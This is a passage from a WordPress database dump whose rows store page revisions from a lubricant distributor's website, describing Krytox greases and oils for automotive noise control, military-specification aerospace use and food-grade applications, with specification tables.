the chance that the bearings will fail with the frequent gear-shifting and high loads experienced throughout the extended driving life of these trucks.\r\n\r\nTo learn more about Krytox Automotive Non Bearing lubrication applications please <a href="https://www.miller-stephenson.com/krytox-automotive/">click here.</a>', 'Krytox Automotive Bearing Lubrication Applications', '', 'inherit', 'closed', 'closed', '', '2503-revision-v1', '', '', '2016-10-12 19:47:41', '2016-10-12 19:47:41', '', 2503, 'https://www.miller-stephenson.com/2503-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2587, 2, '2016-10-12 19:48:13', '2016-10-12 19:48:13', '<strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™</a> Lubricants Can Help Solve Your Automotive Noise, Vibration, and Harshness issues.</strong>\r\n\r\nInside an automobile’s interior, there are a variety of places where different materials come into contact with one another. Examples include metal on plastic, leather on leather, weather stripping, and many others. Movement between these surfaces often results in a series of noises typically described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises with just a small amount of lubricant at the interface.\r\n\r\nBecause these applications are intended to be a one-time application, it is important to choose a lubricant that is easy to apply, has low volatility, and will remain in place over the normal useful life of the vehicle. Krytox™ oils and greases are the answer.\r\n\r\nKrytox™ oils and greases stand up to harsh environments and high temperatures to lubricate weather stripping and parts prone to noise and wear. Krytox™ prevents weather stripping from cracking, shrinking, and swelling to help reduce wind noise, drafts, and water leakage. And, when used on moving parts, Krytox™ lubricants can minimize the shock and stress that cause squeaks, rattles, and damage.\r\n\r\nKrytox™ oils and greases are compatible with a wide variety of materials, and they have the frictional and long life characteristics that make them ideal lubricants in noise, vibration, and harshness applications.\r\n\r\n<strong>Oils and Greases That Really Work in Demanding Real-Life Applications</strong>\r\n\r\nReliable high-performance fluoropolymer lubricants from Chemours can prevent unwanted noises without relubrication. Krytox™ oils and greases are easy to apply, have low volatility, and are long-lasting in aggressive environments.\r\n\r\nKrytox™ Value\r\n<ul>\r\n 	<li>Long-lasting, cost effective lubrication— Krytox™ prevents unwanted noises without re-lubrication. And, Krytox™ stays put, so you can apply a small amount without fear of migration.</li>\r\n 	<li>Material compatibility—Because Krytox™ is compatible with metals, elastomers, and engineering plastics, it won’t damage the components, allowing them to last as designed. • Chemical compatibility and environmental safety—Krytox™ lubricants are chemically, biologically, and environmentally inert, as well as silicone-free. And, they contain no hazardous volatile organic compound materials or chlorine.</li>\r\n 	<li>Lubricity—Krytox™ provides excellent lubricity because of its low coefficient of friction and low surface energy; and because it doesn’t oxidize, it won’t turn sticky or change color.</li>\r\n</ul>\r\n<strong>Application Guidance</strong>\r\n\r\nThe typical coverage for Krytox™ when properly applied is approximately 4 g/m2. Most applications are less than 0.2 g. Each application must be considered separately in order to ensure the best solution is found. There are two main components of any application method:\r\n<ol>\r\n 	<li>Controlled metering of the material from the container to the applicator. This is best done automatically to ensure accuracy and repeatability.</li>\r\n 	<li>Transfer of the material from the applicator to the component. This can be either a manual application, using a brush or foam applicator, or automatically—either by spraying or wiping by robot or specially designed jig.</li>\r\n</ol>\r\n<strong>Application Examples</strong>\r\n\r\nAutomakers from around the world have a long history of using Krytox™ oils and greases to help eliminate automotive squeaks and rattles.\r\n\r\nHere are just a few of the many pain points Krytox™ has been proven to help silence:\r\n<ul>\r\n 	<li>Leather trim, seats, and console parts—Leather-onleather friction can create an irritating noise. Krytox™ gets rid of the itch without staining the leather or becoming sticky over time.</li>\r\n 	<li>Plastic door panel and metal frame—Because Krytox™ is compatible with metals, elastomers, and plastics, it effectively silences noise caused by the interaction of various materials. And, Krytox™ won’t oxidize or discolor plastic. Apply by spraying by hand or using a robot.</li>\r\n 	<li>Rubber gaskets and seals—A thin film of Krytox™ can lubricate sliding contact in convertible tops, sunroofs, trunk lids, and doors to keep the rubber compound in good condition, and protected from oxidation. Grease or oil can be applied by hand, or a jig can be used to guide the application.</li>\r\n 	<li>Window lift systems and weather stripping—Krytox™ can stop weather strip “bunching” and “gathering,” and help eliminate the wind noise produced as window glass is raised. Awkward configuration\r\nof these seals usually means that automatic application is difficult. An automatic dispenser in conjunction with disposable foam applicators is often used. The amount can be controlled by ensuring a preset quantity is dispensed directly from the supply onto the applicator.</li>\r\n</ul>\r\n<img class="alignnone size-medium wp-image-2452" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/noise-vibration-harshness-800x455.jpg" alt="noise-vibration-harshness" width="800" height="455" />\r\n\r\n<strong>Application Systems</strong>\r\n\r\nThere are several manufacturers of equipment that can be used for these applications. The systems can be purchased from one source or fabricated locally from many sources. Automatic dispensing systems for adhesives, sealants, or lubricants can be used as the supply system. Manufacturers such as GRACO, Hydrotech, LCC-Dispensit, or a local distributor can provide controlled application systems for precise dispensing.\r\n\r\nUse of disposable foam tips or brushes can allow accurate coverage of most shapes. Companies such as Designetics or others can provide help in this area.\r\n\r\nChoose Krytox™ for long-lasting lubrication that helps improve vehicle performance and customer satisfaction.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—performance lubricants from Chemours can help. At Chemours, we put our science to work to produce lubricants that can stand up to today’s engineering design demands—no matter how tough the conditions. It’s reliability you can count on, from a name you trust.\r\n\r\n[ux_product_categories ids="46,37,45" number="10"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox For Automotive Noise, Vibration, and Harshness', '', 'inherit', 'closed', 'closed', '', '2450-revision-v1', '', '', '2016-10-12 19:48:13', '2016-10-12 19:48:13', '', 2450, 'https://www.miller-stephenson.com/2450-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2588, 2, '2016-10-12 19:49:30', '2016-10-12 19:49:30', '<h1><strong>MIL PRF-27617 Greases</strong></h1>\r\n<h4><strong>Product Information</strong></h4>\r\nKrytox™ oils and MIL PRF-27617 greases are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are nonflammable and are safe for use in oxygen service. Krytox™ oils and greases are silicone free and do not damage plastics or elastomers, or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial, and semiconductor applications, as well as solving many other routine lubrication problems.\r\n\r\nKrytox™ greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written.\r\n\r\nThis is the latest data from the recertification that is required every five years. Krytox™ greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n<h4><strong>Typical Applications</strong></h4>\r\nApplications for Krytox™ lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity, or down time, Krytox™ is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox™ oils and greases are applied on various settings, spanning from bearings and sealants to O-rings and oxygen systems. Krytox™ is a valuable asset to the aerospace industry, due to its superior performance in a wide range of temperatures scaling from 70 to 399 ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox™ lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the\r\naerospace industry, it can be expected that Krytox™ delivers a high level of product excellence.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">Krytox™  240 AC, 240 AB, and 240 AZ</a> gr-1 are MIL PRF-27617 greases and now have <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF approval for incidental food contact (H-1)</a> in and around food processing areas.\r\n<h4><strong>Preparation Before Packing Bearings With Grease</strong></h4>\r\nNew bearings and equipment that are not lubricated often have rust preventive oils in them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The greases or preservative oils need to be removed when using Krytox™ as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on uncleaned bearings have shown reduced life in high temperature, high speed tests, where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting, so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They also will oxidize and harden, and can create debris that will contaminate the grease.\r\n<h4><strong>Storage and Shelf Life</strong></h4>\r\nKrytox™ grease and oil lubricants have an indefinite shelf life, if unopened and stored in a clean dry location.\r\n\r\nCAGE No.: 43S57\r\n\r\nSIC Code: 2992 Lubricating Oils and Greases\r\n\r\nNAICS Code: 324191 Lubricating Oils and Greases Manufacturing\r\n\r\nDUNS: 557214574\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™</a> MIL PRF-27617 Greases</strong></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240az/"><strong>240 AZ</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ab/"><strong>240 AB</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ac/"><strong>240 AC</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Qualification Reference Number, 1 Oct 2008</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-011</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-012</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-013</td>\r\n</tr>\r\n<tr>\r\n<td>Grease Type/Operating Range, °C (°F)</td>\r\n<td style="text-align: center;" width="206">Type I/–54 to 149\r\n(–65 to 300)</td>\r\n<td style="text-align: center;" width="206">Type II/–40 to 204\r\n(–40 to 399)</td>\r\n<td style="text-align: center;" width="206">Type III/–34 to 288\r\n(–29 to 550)</td>\r\n</tr>\r\n<tr>\r\n<td>NATO Number</td>\r\n<td style="text-align: center;">G-397</td>\r\n<td style="text-align: center;">G-398</td>\r\n<td style="text-align: center;">G-399</td>\r\n</tr>\r\n<tr>\r\n<td>Penetration Grade</td>\r\n<td style="text-align: center;">NLGI 1</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n</tr>\r\n<tr>\r\n<td>Change in Worked Penetration (30 max.)</td>\r\n<td style="text-align: center;">13</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">–3</td>\r\n</tr>\r\n<tr>\r\n<td>Corrosion on Copper (2b max.)</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n</tr>\r\n<tr>\r\n<td width="250">High Temperature Bearing Performance\r\n(500 hr min. at 10,000 RPM, 204 °C [399 °F])</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">Stopped at 1,320 hr</td>\r\n<td style="text-align: center;">Stopped at 1,685 hr</td>\r\n</tr>\r\n<tr>\r\n<td>Evaporation ASTM D-2595, %</td>\r\n<td style="text-align: center;">12.9</td>\r\n<td style="text-align: center;">10.1</td>\r\n<td style="text-align: center;">0.2</td>\r\n</tr>\r\n<tr>\r\n<td>Oil Separation, %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">14.2</td>\r\n<td style="text-align: center;">15.5</td>\r\n</tr>\r\n<tr>\r\n<td>Solubility in Fuel (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.3</td>\r\n<td style="text-align: center;">0.1</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;" width="250">Liquid Oxygen Impact Sensitivity\r\n20 impacts at 43.3 in, no reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Water Washout Characteristics (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.25</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td>Oxidation Stability (5 max.), psi</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.5</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Dirt Count\r\n75 μ and larger (0 per cc max.)\r\n25 to 74 μ (1000 per cc max.)</td>\r\n<td style="text-align: center;">0/26</td>\r\n<td style="text-align: center;">0/0</td>\r\n<td style="text-align: center;">0/0</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Resistance to Aqueous Solution\r\nDistilled Water\r\n50/50 Distilled Water/Ethanol</td>\r\n<td width="206">\r\n<p style="text-align: center;">Pass\r\nPass</p>\r\n</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n</tr>\r\n<tr>\r\n<td>Film Stability and Corrosion on Steel</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Base Oil Viscosity, 40 °C (104 °F), cSt</td>\r\n<td style="text-align: center;">22.8</td>\r\n<td style="text-align: center;">77.8</td>\r\n<td style="text-align: center;">243</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Useful Range, °C</td>\r\n<td style="text-align: center;">–57 to 149</td>\r\n<td style="text-align: center;">–40 to 232</td>\r\n<td style="text-align: center;">–34 to 288</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/krytox/">If these greases are not right for you, please click here to learn more about Krytox greases and oils.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox™ MIL PRF-27617 Greases—Grease, Aircraft and Instrument, Fuel- and Oxidizer-Resistant', '', 'inherit', 'closed', 'closed', '', '2552-revision-v1', '', '', '2016-10-12 19:49:30', '2016-10-12 19:49:30', '', 2552, 'https://www.miller-stephenson.com/2552-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2589, 2, '2016-10-12 19:49:44', '2016-10-12 19:49:44', '<h1><strong>MIL PRF-27617 Greases</strong></h1>\r\n<h4><strong>Product Information</strong></h4>\r\nKrytox™ oils and MIL PRF-27617 greases are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are nonflammable and are safe for use in oxygen service. Krytox™ oils and greases are silicone free and do not damage plastics or elastomers, or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial, and semiconductor applications, as well as solving many other routine lubrication problems.\r\n\r\nKrytox™ greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written.\r\n\r\nThis is the latest data from the recertification that is required every five years. Krytox™ greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n<h4><strong>Typical Applications</strong></h4>\r\nApplications for Krytox™ lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity, or down time, Krytox™ is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox™ oils and greases are applied on various settings, spanning from bearings and sealants to O-rings and oxygen systems. Krytox™ is a valuable asset to the aerospace industry, due to its superior performance in a wide range of temperatures scaling from 70 to 399 ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox™ lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the\r\naerospace industry, it can be expected that Krytox™ delivers a high level of product excellence.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">Krytox™  240 AC, 240 AB, and 240 AZ</a> gr-1 are MIL PRF-27617 greases and now have <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF approval for incidental food contact (H-1)</a> in and around food processing areas.\r\n<h4><strong>Preparation Before Packing Bearings With Grease</strong></h4>\r\nNew bearings and equipment that are not lubricated often have rust preventive oils in them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The greases or preservative oils need to be removed when using Krytox™ as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on uncleaned bearings have shown reduced life in high temperature, high speed tests, where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting, so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They also will oxidize and harden, and can create debris that will contaminate the grease.\r\n<h4><strong>Storage and Shelf Life</strong></h4>\r\nKrytox™ grease and oil lubricants have an indefinite shelf life, if unopened and stored in a clean dry location.\r\n\r\nCAGE No.: 43S57\r\n\r\nSIC Code: 2992 Lubricating Oils and Greases\r\n\r\nNAICS Code: 324191 Lubricating Oils and Greases Manufacturing\r\n\r\nDUNS: 557214574\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™</a> MIL PRF-27617 Greases</strong></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240az/"><strong>240 AZ</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ab/"><strong>240 AB</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ac/"><strong>240 AC</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Qualification Reference Number, 1 Oct 2008</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-011</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-012</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-013</td>\r\n</tr>\r\n<tr>\r\n<td>Grease Type/Operating Range, °C (°F)</td>\r\n<td style="text-align: center;" width="206">Type I/–54 to 149\r\n(–65 to 300)</td>\r\n<td style="text-align: center;" width="206">Type II/–40 to 204\r\n(–40 to 399)</td>\r\n<td style="text-align: center;" width="206">Type III/–34 to 288\r\n(–29 to 550)</td>\r\n</tr>\r\n<tr>\r\n<td>NATO Number</td>\r\n<td style="text-align: center;">G-397</td>\r\n<td style="text-align: center;">G-398</td>\r\n<td style="text-align: center;">G-399</td>\r\n</tr>\r\n<tr>\r\n<td>Penetration Grade</td>\r\n<td style="text-align: center;">NLGI 1</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n</tr>\r\n<tr>\r\n<td>Change in Worked Penetration (30 max.)</td>\r\n<td style="text-align: center;">13</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">–3</td>\r\n</tr>\r\n<tr>\r\n<td>Corrosion on Copper (2b max.)</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n</tr>\r\n<tr>\r\n<td width="250">High Temperature Bearing Performance\r\n(500 hr min. at 10,000 RPM, 204 °C [399 °F])</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">Stopped at 1,320 hr</td>\r\n<td style="text-align: center;">Stopped at 1,685 hr</td>\r\n</tr>\r\n<tr>\r\n<td>Evaporation ASTM D-2595, %</td>\r\n<td style="text-align: center;">12.9</td>\r\n<td style="text-align: center;">10.1</td>\r\n<td style="text-align: center;">0.2</td>\r\n</tr>\r\n<tr>\r\n<td>Oil Separation, %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">14.2</td>\r\n<td style="text-align: center;">15.5</td>\r\n</tr>\r\n<tr>\r\n<td>Solubility in Fuel (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.3</td>\r\n<td style="text-align: center;">0.1</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;" width="250">Liquid Oxygen Impact Sensitivity\r\n20 impacts at 43.3 in, no reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Water Washout Characteristics (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.25</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td>Oxidation Stability (5 max.), psi</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.5</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Dirt Count\r\n75 μ and larger (0 per cc max.)\r\n25 to 74 μ (1000 per cc max.)</td>\r\n<td style="text-align: center;">0/26</td>\r\n<td style="text-align: center;">0/0</td>\r\n<td style="text-align: center;">0/0</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Resistance to Aqueous Solution\r\nDistilled Water\r\n50/50 Distilled Water/Ethanol</td>\r\n<td width="206">\r\n<p style="text-align: center;">Pass\r\nPass</p>\r\n</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n</tr>\r\n<tr>\r\n<td>Film Stability and Corrosion on Steel</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Base Oil Viscosity, 40 °C (104 °F), cSt</td>\r\n<td style="text-align: center;">22.8</td>\r\n<td style="text-align: center;">77.8</td>\r\n<td style="text-align: center;">243</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Useful Range, °C</td>\r\n<td style="text-align: center;">–57 to 149</td>\r\n<td style="text-align: center;">–40 to 232</td>\r\n<td style="text-align: center;">–34 to 288</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/krytox/">If these greases are not right for you, please click here to learn more about Krytox greases and oils.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox MIL PRF-27617 Greases—Grease, Aircraft and Instrument, Fuel- and Oxidizer-Resistant', '', 'inherit', 'closed', 'closed', '', '2552-revision-v1', '', '', '2016-10-12 19:49:44', '2016-10-12 19:49:44', '', 2552, 'https://www.miller-stephenson.com/2552-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2590, 2, '2016-10-12 19:50:27', '2016-10-12 19:50:27', '<h1><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™</a> NSF H-1 Food Grade Lubricants - Safe for Incidental Food Contact</strong></h1>\r\nChoosing the right lubricant for your equipment just got a lot easier with H-1 certified Krytox™ food grade lubricants from Miller-Stephenson.\r\n\r\nAs with the full line of Krytox™ lubricants, Krytox™ oils and greases deliver superior performance with advanced features of high-temperature stability, nonflammability, and chemical and biological inertness. Krytox lubricants will not carbonize or form gummy deposits that typically cause failures, nor will they evaporate. Therefore, maintenance costs can be significantly reduced.\r\n\r\nThe composition of Krytox™ lubricants allows them to function in a wide range of operating temperatures and chemical environments. Krytox™ food grade lubricants will not break down under mechanical stress. The oils are clear, colorless, and odorless, and the grease is white.\r\n\r\nKrytox™ lubricants comply fully with USDA performance standards for designated uses. These lubricant products are not intended to be used as direct food additives. Use Krytox™ oils and greases whenever a long-lasting, tenacious, chemically inert lubricant is needed for your demanding applications.\r\n<h2>Stability and Compatibility</h2>\r\nKrytox™ oils contain only carbon, oxygen, and fluorine. The oils will not burn or support combustion, even in 100% liquid or gaseous oxygen. They are chemically inert and will not break\r\ndown in the presence of most chemicals.\r\n\r\nBecause Krytox™ food grade lubricants are essentially inert, they are safe to use with most metals, plastics, and seal materials, and they are completely resistant to water and steam. Krytox™ lubricants protect bearings and other components under a wide range of load and speed conditions. Components run quieter, and wear protection is extended. Krytox™ lubricants will not break down under extreme pressure or high mechanical stress.\r\n\r\nVarious grades of Krytox™ food grade lubricants are serviceable for long periods of time at continuous temperatures between –60–300 °C (–58–600 °F). There are also special grades that can routinely handle temperatures of 350 °C (662 °F) and withstand peaks up to 400 °C (752 °F) for shorter periods of time.\r\n\r\nUse Krytox™ lubricants on chains, bearings, valves, seals, or any place a long-lasting lubricant is needed.\r\n<h2>Safety and Environmental Protection</h2>\r\nUsing Krytox™ greases and oils:\r\n<ul>\r\n 	<li>Reduces the need for hydrocarbon lubricants</li>\r\n 	<li>Helps allay any concerns about emissions or other potential environmental impact</li>\r\n 	<li>Avoids the inconvenience and cost associated with the disposal of hydrocarbon-based oils and greases.</li>\r\n</ul>\r\nKrytox™ greases and oils are non-toxic, easy to handle, and do not release volatile organic compounds to the atmosphere. Additionally, Chemours has a regeneration program that reclaims used oil and restores it to its original properties. This lowers the overall cost of lubrication, and eliminates safety and environmental disposal problems.\r\n\r\n<img class="alignnone wp-image-2443" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Krytox-Hydrocarbon.jpg" alt="krytox-hydrocarbon" width="349" height="364" />\r\n<h2>Benefits in Use</h2>\r\nThe extended life you will see with Krytox™ lubricants means longer re-lubrication intervals, less maintenance, and improved cleanliness. The overall superior stability of Krytox™ lubricants also can result in less downtime and fewer failures due to lubricant carbonization, evaporation, or other deterioration. Water washout and steam cleaning will not affect Krytox™ lubricants. In addition, because Krytox™ lubricants can be used in many applications and last so long, your total lubricant inventory can be reduced, as well as the need for frequent movement of drums around your facility.\r\n\r\nThe combination of all of these factors translates to long-term cost savings for your business.\r\n\r\n<img class="alignnone size-medium wp-image-2444" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/krytox-comparison-800x311.jpg" alt="krytox-comparison" width="800" height="311" />\r\n<h2>Applications for Krytox™ H-1 Food Grade Lubricants</h2>\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Type</strong></td>\r\n<td width="206"><strong>Products</strong></td>\r\n<td width="206"><strong>Application</strong></td>\r\n<td width="206"><strong>Comments</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/">Multipurpose Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-202/">Krytox™ GPL 202</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-203/">Krytox™ GPL 203</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox™ GPL 205</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-206/">Krytox™ GPL 206</a></td>\r\n<td>Bearings, valves, seals, O-rings</td>\r\n<td>For non-corrosive environments at standard operating temperatures</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">Anti-Corrosion Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-223/">Krytox™ GPL 223</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-226/">Krytox™ GPL 226</a>\r\nKrytox™ FG 34</td>\r\n<td>Bearings, valves, seals, O-rings</td>\r\n<td>For non-corrosive environments at standard operating temperatures</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/">High-Temperature Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-xht-sx/">Krytox™ XHT-SX</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-xht-ac/">Krytox™ XHT-AC</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-xht-acx/">Krytox™ XHT-ACX</a></td>\r\n<td>Bearings and chains</td>\r\n<td>Krytox™ XHT-AC and ACX contain corrosion inhibitor</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Lubricating Oils</td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox™ GPL 105</a>\r\n<a href="https://www.miller-stephenson.com/product/xht-500/">Krytox™ XHT-500</a>\r\n<a href="https://www.miller-stephenson.com/product/xp-1a5/">Krytox™ XP-1A5</a>\r\nKrytox™ FG 40</td>\r\n<td>Chains, compressors, bearings, gear boxes</td>\r\n<td>Krytox™ XHT-500 is formulated for high temperatures; Krytox™ XP-1A5 contains corrosion inhibitor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-vpf-1506/">Krytox™ 1506</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ 1514</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1525/">Krytox™ 1525</a></td>\r\n<td>Mechanical pumps</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[ux_product_categories ids="46,115,38" number="10"]', 'Krytox H-1 Food Grade Lubricants', '', 'inherit', 'closed', 'closed', '', '2442-revision-v1', '', '', '2016-10-12 19:50:27', '2016-10-12 19:50:27', '', 2442, 